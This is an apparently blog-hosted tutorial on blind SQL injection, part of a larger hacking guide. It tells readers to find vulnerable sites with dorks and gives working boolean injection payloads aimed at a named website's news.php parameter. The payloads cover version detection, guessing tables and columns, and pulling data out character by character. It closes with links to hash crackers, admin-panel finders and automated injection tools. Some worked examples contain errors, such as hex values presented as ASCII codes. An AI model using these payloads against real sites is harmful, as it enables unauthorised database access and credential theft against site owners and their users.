S0.6 - Blind SQL Injection
Let me start of by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Lets get started anyway. I found a site which I could use union based injection on so I wouldn't have to guess the table names, which made this tutorial alot easier to write.
First of all we will want to find a site using dorks, mentioned erlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based, i'll make a tutorial for that soon).
When we have our site, with a vulnerable parameter, you will want to test if it is vulnerable. We can do this by adding "and 1=1" onto the end of our url, and if it loads normally then thats good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use
Code:
and substring(@@version,1,1)=VERSIONHERE
Where we have "VERSIONHERE", you will want to put the version there. Most sites would either use 4 or 5. Using what i said erlier, if the version is false, it won't load correctly. If it is true, it will.
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example as, I just quickly got the tables/columns doing it that way to make the tutorial simple. But otherwise you would have to guess it. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from test limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from test2 limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from chapters limit 0,1)=1
Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one in ascii. So "test" = "74 65 73 74". You can find an ascii chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the hackbar addon for firefox. Or use this - http://easycalculation.com/ascii-hex.php.
We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE
It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>111
Resources.
http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves alot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.
0 (mga) komento:
Mag-post ng isang Komento